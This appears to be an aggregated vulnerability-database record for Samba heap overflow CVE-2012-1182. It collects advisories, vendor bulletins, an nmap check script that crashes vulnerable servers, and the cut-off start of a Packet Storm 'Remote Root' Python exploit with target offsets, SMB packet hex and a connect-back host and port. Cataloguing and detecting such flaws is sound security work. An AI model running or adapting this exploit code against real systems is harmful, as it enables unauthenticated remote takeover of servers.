ID: ZDI-12-072
Type: zdi
Reporter: Anonymous
Modified: 2012-06-22T00:00:00
Description
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within the way Samba handles ReportEventW requests. When parsing the data sent in the request, Samba uses the field 'strings' to create a heap allocation but then uses another field, 'num_of_strings', to write data to the allocation. Because there is no check to see if 'num_of_strings' is smaller than 'strings', this could result in a heap buffer overflow that could lead to remote code execution.
{"edition": 3, "title": "Samba ReportEventW Heap Overflow Remote Code Execution Vulnerability", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within the way Samba handles ReportEventW requests. When parsing the data send in the request Samba uses the field 'strings' to create a heap allocation but then uses another field, 'num_of_strings', to write data to the allocation. Because there is no check to see if 'num_of_strings' is smaller than 'strings' this could result in a heap buffer overflow that could lead to remote code execution.", "viewCount": 4, "cvelist": ["CVE-2012-1182"], "bulletinFamily": "info", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-072/", "id": "ZDI-12-072", "reporter": "Anonymous", "published": "2012-04-18T00:00:00", "references": ["http://www.samba.org/samba/security/CVE-2012-1182"], "lastseen": "2020-06-22T11:40:50", "modified": "2012-06-22T00:00:00", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-1182"]}, {"type": "f5", "idList": ["SOL13719", "F5:K13719"]}, {"type": "nmap", "idList": ["NMAP:SAMBA-VULN-CVE-2012-1182.NSE"]}, {"type": "seebug", "idList": ["SSV:60050"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12328", "SECURITYVULNS:VULN:12426"]}, {"type": "suse", "idList": ["SUSE-SU-2012:0501-2", "SUSE-SU-2012:0504-1", "SUSE-SU-2012:0501-1", "OPENSUSE-SU-2012:0508-1"]}, {"type": "openvas", "idList": ["OPENVAS:71254", "OPENVAS:1361412562310840980", "OPENVAS:136141256231071254", "OPENVAS:1361412562310881194", "OPENVAS:1361412562310123695", "OPENVAS:840980", "OPENVAS:1361412562310850289", "OPENVAS:870584", "OPENVAS:1361412562310864238", "OPENVAS:1361412562310864213"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-0515", "ELSA-2012-0465", 
"ELSA-2013-0506", "ELSA-2012-0478", "ELSA-2012-0466"]}, {"type": "zdi", "idList": ["ZDI-12-063", "ZDI-12-062", "ZDI-12-068", "ZDI-12-069", "ZDI-12-070", "ZDI-12-061", "ZDI-12-064", "ZDI-12-071"]}, {"type": "nessus", "idList": ["FEDORA_2012-6349.NASL", "SL_20120410_SAMBA_ON_SL5_X.NASL", "SAMBA_RPC_MULTIPLE_BUFFER_OVERFLOWS.NASL", "ORACLELINUX_ELSA-2012-0478.NASL", "SL_20130221_SAMBA4_ON_SL6_X.NASL", "ORACLELINUX_ELSA-2012-0466.NASL", "SOLARIS11_SAMBA_20121016.NASL", "SL_20130221_OPENCHANGE_ON_SL6_X.NASL", "CENTOS_RHSA-2012-0466.NASL", "REDHAT-RHSA-2013-0506.NASL"]}, {"type": "ubuntu", "idList": ["USN-1423-1"]}, {"type": "freebsd", "idList": ["BAF37CD2-8351-11E1-894E-00215C6A37BB"]}, {"type": "fedora", "idList": ["FEDORA:77AFB20FC7", "FEDORA:7D08020F24"]}, {"type": "redhat", "idList": ["RHSA-2012:0465", "RHSA-2013:0515", "RHSA-2013:0506", "RHSA-2012:0478"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/SAMBA/SETINFOPOLICY_HEAP"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2450-1:77F45", "DEBIAN:BSA-070:68853"]}, {"type": "centos", "idList": ["CESA-2013:0506", "CESA-2012:0465", "CESA-2013:0515", "CESA-2012:0466"]}, {"type": "canvas", "idList": ["CVE_2012_1182_NONX"]}, {"type": "cisa", "idList": ["CISA:C73BC9C5DAF991808EA4A267072DA584"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:116953"]}, {"type": "exploitdb", "idList": ["EDB-ID:21850"]}, {"type": "samba", "idList": ["SAMBA:CVE-2012-1182"]}], "modified": "2020-06-22T11:40:50", "rev": 2}, "score": {"value": 8.7, "vector": "NONE", "modified": "2020-06-22T11:40:50", "rev": 2}, "vulnersScore": 8.7}, "type": "zdi", "scheme": null}
{"cve": [{"lastseen": "2021-02-02T09:44:39", "description": "The RPC code generator in Samba 3.x before 3.4.16, 3.5.x before 3.5.14, and 3.6.x before 3.6.4 does not implement validation of an array length in a manner consistent with validation of array memory allocation, which allows remote attackers to execute arbitrary code via a crafted RPC call.", "edition": 6, "cvss3": {}, "published": "2012-04-10T21:55:00", "title": "CVE-2012-1182", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2018-10-30T16:25:00", "id": "CVE-2012-1182", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1182", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2017-06-08T00:16:13", "bulletinFamily": "software", "cvelist": ["CVE-2012-1182"], "edition": 1, "description": "\nF5 Product Development has evaluated the currently-supported releases for potential vulnerability. 
To find out whether F5 has determined that your release is vulnerable, and to obtain information about releases or hotfixes that resolve the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM| None| 9.x \n10.x \n11.x| None \nBIG-IP GTM| None| 9.x \n10.x \n11.x| None \nBIG-IP ASM| None| 9.x \n10.x \n11.x| None \nBIG-IP AAM| None| 11.x| None \nBIG-IP Link Controller| None| 9.x \n10.x \n11.x| None \nBIG-IP WebAccelerator| None| 9.x \n10.x \n11.x| None \nBIG-IP PSM| None| 10.x \n11.x| None \nBIG-IP WOM| None| 10.x \n11.x| None \nBIG-IP APM| None| 10.x \n11.x| None \nBIG-IP Edge Gateway| None| 10.x \n11.x| None \nBIG-IP Analytics| None| 11.x| None \nBIG-IP AFM| None| 11.x| None \nBIG-IP PEM| None| 11.x| None \nFirePass| None| 6.x \n7.x| None \nEnterprise Manager| None| 1.x \n2.x \n3.x| None \nARX| None| 6.x \n5.x| None \nNone \nNone\n\nNone \n\n\n * [CVE-2012-1182 ](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1182>)\n\n**Note**: The previous link takes you to a resource outside of AskF5, and it is possible that the information may be removed without our knowledge.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents.](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n", "modified": "2016-07-01T23:45:00", "published": "2012-07-10T20:45:00", "href": "https://support.f5.com/csp/article/K13719", "id": "F5:K13719", "title": "Samba vulnerability CVE-2012-1182", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:00", "bulletinFamily": "software", "cvelist": ["CVE-2012-1182"], "edition": 1, 
"description": "Vulnerability Recommended Actions\n\nNone \n\n\nSupplemental Information\n\n * [CVE-2012-1182 ](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1182>)\n\n**Note**: The previous link takes you to a resource outside of AskF5, and it is possible that the information may be removed without our knowledge.\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n", "modified": "2016-07-01T00:00:00", "published": "2012-07-10T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/13000/700/sol13719.html", "id": "SOL13719", "title": "SOL13719 - Samba vulnerability CVE-2012-1182", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nmap": [{"lastseen": "2019-05-30T17:05:41", "description": "Checks if target machines are vulnerable to the Samba heap overflow vulnerability CVE-2012-1182. \n\nSamba versions 3.6.3 and all versions previous to this are affected by a vulnerability that allows remote code execution as the \"root\" user from an anonymous connection. \n\nCVE-2012-1182 marks multiple heap overflow vulnerabilities located in PIDL based autogenerated code. This check script is based on PoC by ZDI marked as ZDI-CAN-1503. Vulnerability lies in ndr_pull_lsa_SidArray function where an attacker is under control of num_sids and can cause insufficient memory to be allocated, leading to heap buffer overflow and possibility of remote code execution. \n\nScript builds a malicious packet and makes a SAMR GetAliasMembership call which triggers the vulnerability. On the vulnerable system, connection is dropped and result is \"Failed to receive bytes after 5 attempts\". On patched system, samba throws an error and result is \"MSRPC call returned a fault (packet type)\". 
\n\nReferences: \n\n * https://bugzilla.samba.org/show_bug.cgi?id=8815\n * http://www.samba.org/samba/security/CVE-2012-1182\n\n## Script Arguments \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap --script=samba-vuln-cve-2012-1182 -p 139 <target>\n\n## Script Output \n \n \n PORT STATE SERVICE\n 139/tcp open netbios-ssn\n \n Host script results:\n | samba-vuln-cve-2012-1182:\n | VULNERABLE:\n | SAMBA remote heap overflow\n | State: VULNERABLE\n | IDs: CVE:CVE-2012-1182\n | Risk factor: HIGH CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n | Description:\n | Samba versions 3.6.3 and all versions previous to this are affected by\n | a vulnerability that allows remote code execution as the \"root\" user\n | from an anonymous connection.\n |\n | Disclosure date: 2012-03-15\n | References:\n | http://www.samba.org/samba/security/CVE-2012-1182\n |_ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1182\n\n## Requires \n\n * msrpc\n * smb\n * string\n * vulns\n * stdnse\n\n* * *\n", "edition": 7, "published": "2012-04-21T22:44:23", "title": "samba-vuln-cve-2012-1182 NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "modified": "2018-09-05T21:57:41", "id": "NMAP:SAMBA-VULN-CVE-2012-1182.NSE", "href": "https://nmap.org/nsedoc/scripts/samba-vuln-cve-2012-1182.html", "sourceData": "local msrpc = require \"msrpc\"\nlocal smb = require \"smb\"\nlocal string = require \"string\"\nlocal vulns = require \"vulns\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nChecks if target machines are vulnerable to the Samba heap overflow vulnerability CVE-2012-1182.\n\nSamba versions 3.6.3 and all versions previous to this are affected by\na 
vulnerability that allows remote code execution as the \"root\" user\nfrom an anonymous connection.\n\n\nCVE-2012-1182 marks multiple heap overflow vulnerabilities located in\nPIDL based autogenerated code. This check script is based on PoC by ZDI\nmarked as ZDI-CAN-1503. Vulnerability lies in ndr_pull_lsa_SidArray\nfunction where an attacker is under control of num_sids and can cause\ninsufficient memory to be allocated, leading to heap buffer overflow\nand possibility of remote code execution.\n\nScript builds a malicious packet and makes a SAMR GetAliasMembership\ncall which triggers the vulnerability. On the vulnerable system,\nconnection is dropped and result is \"Failed to receive bytes after 5 attempts\".\nOn patched system, samba throws an error and result is \"MSRPC call\nreturned a fault (packet type)\".\n\nReferences:\n* https://bugzilla.samba.org/show_bug.cgi?id=8815\n* http://www.samba.org/samba/security/CVE-2012-1182\n\n]]\n\n-----------------------------------------------------------------------\n---\n-- @usage\n-- nmap --script=samba-vuln-cve-2012-1182 -p 139 <target>\n-- @output\n-- PORT STATE SERVICE\n-- 139/tcp open netbios-ssn\n--\n-- Host script results:\n-- | samba-vuln-cve-2012-1182:\n-- | VULNERABLE:\n-- | SAMBA remote heap overflow\n-- | State: VULNERABLE\n-- | IDs: CVE:CVE-2012-1182\n-- | Risk factor: HIGH CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n-- | Description:\n-- | Samba versions 3.6.3 and all versions previous to this are affected by\n-- | a vulnerability that allows remote code execution as the \"root\" user\n-- | from an anonymous connection.\n-- |\n-- | Disclosure date: 2012-03-15\n-- | References:\n-- | http://www.samba.org/samba/security/CVE-2012-1182\n-- |_ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1182\n\nauthor = \"Aleksandar Nikolic\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\",\"intrusive\"}\n\nhostrule = function(host)\n return smb.get_port(host) ~= 
nil\nend\n\naction = function(host,port)\n\n local result, stats\n local response = {}\n\n local samba_cve = {\n title = \"SAMBA remote heap overflow\",\n IDS = {CVE = 'CVE-2012-1182'},\n risk_factor = \"HIGH\",\n scores = {\n CVSSv2 = \"10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)\",\n },\n description = [[\nSamba versions 3.6.3 and all versions previous to this are affected by\na vulnerability that allows remote code execution as the \"root\" user\nfrom an anonymous connection.\n]],\n references = {\n 'http://www.samba.org/samba/security/CVE-2012-1182',\n },\n dates = {\n disclosure = {year = '2012', month = '03', day = '15'},\n },\n exploit_results = {},\n }\n\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n samba_cve.state = vulns.STATE.NOT_VULN\n\n -- create SMB session\n local status, smbstate\n status, smbstate = msrpc.start_smb(host, msrpc.SAMR_PATH,true)\n if(status == false) then\n return false, smbstate\n end\n\n -- bind to SAMR service\n local bind_result\n status, bind_result = msrpc.bind(smbstate, msrpc.SAMR_UUID, msrpc.SAMR_VERSION, nil)\n if(status == false) then\n msrpc.stop_smb(smbstate)\n return false, bind_result\n end\n\n -- create malicious packet, same as in the PoC\n local data = string.pack(\"<I4\",4096) -- num_sids\n .. 
\"abcd\"\n ..string.pack(\"<I4I4I4\",100\n ,0\n ,100)\n ..string.rep(\"a\",1000)\n\n local marshaledHandle = string.rep(\"X\",20)\n status, result = msrpc.samr_getaliasmembership(smbstate,marshaledHandle, data)\n stdnse.debug2(\"msrpc.samr_getaliasmembership: %s, '%s'\", status, result)\n if(status == false and string.find(result,\"Failed to receive bytes after 5 attempts\") ~= nil) then\n samba_cve.state = vulns.STATE.VULN -- connection dropped, server crashed\n end\n\n return report:make_output(samba_cve)\n\nend\n\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T17:53:36", "description": "CVE ID: CVE-2012-1182\r\n\r\nSamba is a suite of programs that implements the SMB (Server Messages Block) protocol and provides cross-platform file sharing and print sharing services.\r\n\r\nAn error in the RPC code generator of Samba versions before 3.6.3 causes the generated code to contain security vulnerabilities; this generated code is used in the part of Samba that controls RPC network data handling. An attacker can use a specially crafted RPC call, without user authentication, to cause the server to execute arbitrary code.\r\n0\r\nSamba < 3.6.3\r\nVendor patch:\r\n\r\nSamba\r\n-----\r\nThe vendor has not yet provided a patch or upgrade; we recommend that users of this software keep checking the vendor's home page to obtain the latest version:\r\n\r\nhttp://www.samba.org/", "published": "2012-04-12T00:00:00", "type": "seebug", "title": "Samba versions < 3.6.3 ndr_pull_lsa_SidArray heap overflow vulnerability (CVE-2012-1182)", "bulletinFamily": "exploit", 
"cvelist": ["CVE-2012-1182"], "modified": "2012-04-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60050", "id": "SSV:60050", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:47", "bulletinFamily": "software", "cvelist": ["CVE-2012-1182"], "description": "No description provided", "edition": 1, "modified": "2012-06-17T00:00:00", "published": "2012-06-17T00:00:00", "id": "SECURITYVULNS:VULN:12426", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12426", "title": "HP Server Automation code execution", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:44", "bulletinFamily": "software", "cvelist": ["CVE-2012-1182"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c03366886\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c03366886\r\nVersion: 1\r\n\r\nHPSBMU02790 SSRT100872 rev.1 - HP Server Automation, Remote Execution of\r\nArbitrary Code\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2012-06-11\r\nLast Updated: 2012-06-11\r\n\r\nPotential Security Impact: Remote execution of arbitrary code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Server\r\nAutomation for Linux and SunOS. This vulnerability could by exploited\r\nremotely resulting in the execution of arbitrary code. 
The vulnerability is\r\nin Samba which is used in HP Server Automation.\r\n\r\nReferences: CVE-2012-1182\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Server Automation v7.8x, v9.0x, v9.1x on RedHat Linux, Suse Linux, and\r\nSunOS\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2012-1182 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has provided HP Server Automation Patch SRVA_00127.tar.gz to resolve this\r\nissue. The patch is available on HP's SSO here:\r\nhttp://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_SRVA_00127\r\n\r\nHISTORY\r\nVersion:1 (rev.1) 11 June 2012 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin List: A list of HP Security Bulletins, updated\r\nperiodically, is contained in HP Security Notice HPSN-2011-001:\r\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c02964430\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttp://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2012 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits;damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. 
The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAk/V+3oACgkQ4B86/C0qfVnNIwCdHLlLQQANRVn3NY7HPMQvo5Y0\r\n3AgAoI1Jvj4NXs1QOB0oshhDlFuDsizm\r\n=3sLX\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-06-17T00:00:00", "published": "2012-06-17T00:00:00", "id": "SECURITYVULNS:DOC:28165", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28165", "title": "[security bulletin] HPSBMU02790 SSRT100872 rev.1 - HP Server Automation, Remote Execution of Arbitrary Code", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:15:22", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "A remote code execution flaw in Samba has been fixed:\n\n * CVE-2012-1182: PIDL based autogenerated code uses\n client supplied size values which allows attackers to write\n beyond the allocated array size\n\n Also the following bug has been fixed:\n\n * mount.cifs: Properly update mtab during remount;\n (bnc#747906).\n", "edition": 1, "modified": "2012-04-14T14:08:17", "published": "2012-04-14T14:08:17", "id": "SUSE-SU-2012:0504-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-04/msg00009.html", "title": "Security update for Samba (critical)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:46:06", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "A remote code execution flaw in Samba has been fixed:\n\n * CVE-2012-1182: 
PIDL based autogenerated code uses\n client supplied size values which allows attackers to write\n beyond the allocated array size\n\n Also the following bugs have been fixed:\n\n * Samba printer name marshalling problems (bnc#722663)\n * mount.cifs: properly update mtab during remount\n (bnc#747906)\n * s3: compile IDL files in autogen, some configure\n tests need this.\n * Fix incorrect types in the full audit VFS module. Add\n null terminators to audit log enums (bnc#742885)\n * Do not map POSIX execute permission to Windows\n FILE_READ_ATTRIBUTES; (bso#8631); (bnc#732572).\n", "edition": 1, "modified": "2012-04-14T10:08:18", "published": "2012-04-14T10:08:18", "id": "SUSE-SU-2012:0500-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-04/msg00006.html", "type": "suse", "title": "Security update for Samba (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:36:14", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "A remote code execution flaw in Samba has been fixed:\n\n * CVE-2012-1182: PIDL based autogenerated code uses\n client supplied size values which allows attackers to write\n beyond the allocated array size\n", "edition": 1, "modified": "2012-04-14T10:08:19", "published": "2012-04-14T10:08:19", "id": "SUSE-SU-2012:0501-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-04/msg00007.html", "type": "suse", "title": "Security update for Samba (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:05:46", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "A remote code execution flaw in Samba has been fixed:\n\n * CVE-2012-1182: PIDL based autogenerated code uses\n client supplied size values which allows attackers to write\n beyond the allocated array size\n", "edition": 1, "modified": 
"2012-04-14T14:08:19", "published": "2012-04-14T14:08:19", "id": "SUSE-SU-2012:0501-2", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-04/msg00010.html", "title": "Security update for Samba (critical)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:26", "description": "", "published": "2012-09-25T00:00:00", "type": "packetstorm", "title": "Samba 3.x Remote Root", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1182"], "modified": "2012-09-25T00:00:00", "id": "PACKETSTORM:116843", "href": "https://packetstormsecurity.com/files/116843/Samba-3.x-Remote-Root.html", "sourceData": "`#!/usr/bin/python \n# \n# finding targets 4 31337z: \n# gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1 | awk '{ print $2 }'` <<< `echo -e \"print system\"` | grep '$1' \n# -> to get system_libc_addr, enter this value in the 'system_libc_offset' value of the target_finder, run, sit back, wait for shell \n# found by eax samba 0day godz (loljk) \n \n \nfrom binascii import hexlify, unhexlify \nimport socket \nimport threading \nimport SocketServer \nimport sys \nimport os \nimport time \nimport struct \n \ntargets = [ \n{ \n\"name\" : \"samba_3.6.3-debian6\", \n\"chunk_offset\" : 0x9148, \n\"system_libc_offset\" : 0xb6d003c0 \n}, \n{ \n\"name\" : \"samba_3.5.11~dfsg-1ubuntu2.1_i386 (oneiric)\", \n\"chunk_offset\" : 4560, \n\"system_libc_offset\" : 0xb20 \n}, \n{ \n\"name\" : \"target_finder (hardcode correct system addr)\", \n\"chunk_offset\" : 0, \n\"system_libc_offset\" : 0xb6d1a3c0, \n\"finder\": True \n} \n] \n \ndo_brute = True \nrs = 1024 \nFILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' 
for x in range(256)]) \n \ndef dump(src, length=32): \nresult=[] \nfor i in xrange(0, len(src), length): \ns = src[i:i+length] \nhexa = ' '.join([\"%02x\"%ord(x) for x in s]) \nprintable = s.translate(FILTER) \nresult.append(\"%04x %-*s %s\\n\" % (i, length*3, hexa, printable)) \nreturn ''.join(result) \n \n \nsploitshake = [ \n# HELLO \n\"8100004420434b4644454e4543464445\" + \\ \n\"46464346474546464343414341434143\" + \\ \n\"41434143410020454745424644464545\" + \\ \n\"43455046494341434143414341434143\" + \\ \n\"4143414341414100\", \n \n# NTLM_NEGOT \n\"0000002fff534d427200000000000000\" + \\ \n\"00000000000000000000000000001d14\" + \\ \n\"00000000000c00024e54204c4d20302e\" + \\ \n\"313200\", \n \n# SESSION_SETUP \n\"0000004bff534d427300000000080000\" + \\ \n\"000000000000000000000000ffff1d14\" + \\ \n\"000000000dff000000ffff02001d1499\" + \\ \n\"1f00000000000000000000010000000e\" + \\ \n\"000000706f736978007079736d6200\", \n \n# TREE_CONNECT \n\"00000044ff534d427500000000080000\" + \\ \n\"000000000000000000000000ffff1d14\" + \\ \n\"6400000004ff00000000000100190000\" + \\ \n\"5c5c2a534d425345525645525c495043\" + \\ \n\"24003f3f3f3f3f00\", \n \n# NT_CREATE \n\"00000059ff534d42a200000000180100\" + \\ \n\"00000000000000000000000001001d14\" + \\ \n\"6400000018ff00000000050016000000\" + \\ \n\"000000009f0102000000000000000000\" + \\ \n\"00000000030000000100000040000000\" + \\ \n\"020000000306005c73616d7200\" \n] \n \npwnsauce = { \n'smb_bind': \\ \n\"00000092ff534d422500000000000100\" + \\ \n\"00000000000000000000000001001d14\" + \\ \n\"6400000010000048000004e0ff000000\" + \\ \n\"0000000000000000004a0048004a0002\" + \\ \n\"002600babe4f005c504950455c000500\" + \\ \n\"0b03100000004800000001000000b810\" + \\ \n\"b8100000000001000000000001007857\" + \\ \n\"34123412cdabef000123456789ab0000\" + \\ \n\"0000045d888aeb1cc9119fe808002b10\" + \\ \n\"486002000000\", \n \n'data_chunk': \\ \n\"000010efff534d422f00000000180000\" + \\ \n\"00000000000000000000000001001d14\" + \\ 
\n\"640000000eff000000babe00000000ff\" + \\ \n\"0000000800b0100000b0103f00000000\" + \\ \n\"00b0100500000110000000b010000001\" + \\ \n\"0000009810000000000800\", \n \n'final_chunk': \\ \n\"000009a3ff534d422f00000000180000\" + \\ \n\"00000000000000000000000001001d14\" + \\ \n\"640000000eff000000babe00000000ff\" + \\ \n\"00000008006409000064093f00000000\" + \\ \n\"00640905000002100000006409000001\" + \\ \n\"0000004c09000000000800\" \n} \n \n \ndef exploit(host, port, cbhost, cbport, target): \nglobal sploitshake, pwnsauce \n \nchunk_size = 4248 \n \ntarget_tcp = (host, port) \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect(target_tcp) \n \nn = 0 \nfor pkt in sploitshake: \ns.send(unhexlify(pkt)) \npkt_res = s.recv(rs) \nn = n+1 \n \nfid = hexlify(pkt_res[0x2a] + pkt_res[0x2b]) \n \ns.send(unhexlify(pwnsauce['smb_bind'].replace(\"babe\", fid))) \npkt_res = s.recv(rs) \n \nbuf = \"X\"*20 # policy handle \nlevel = 2 #LSA_POLICY_INFO_AUDIT_EVENTS \nbuf+=struct.pack('<H',level) # level 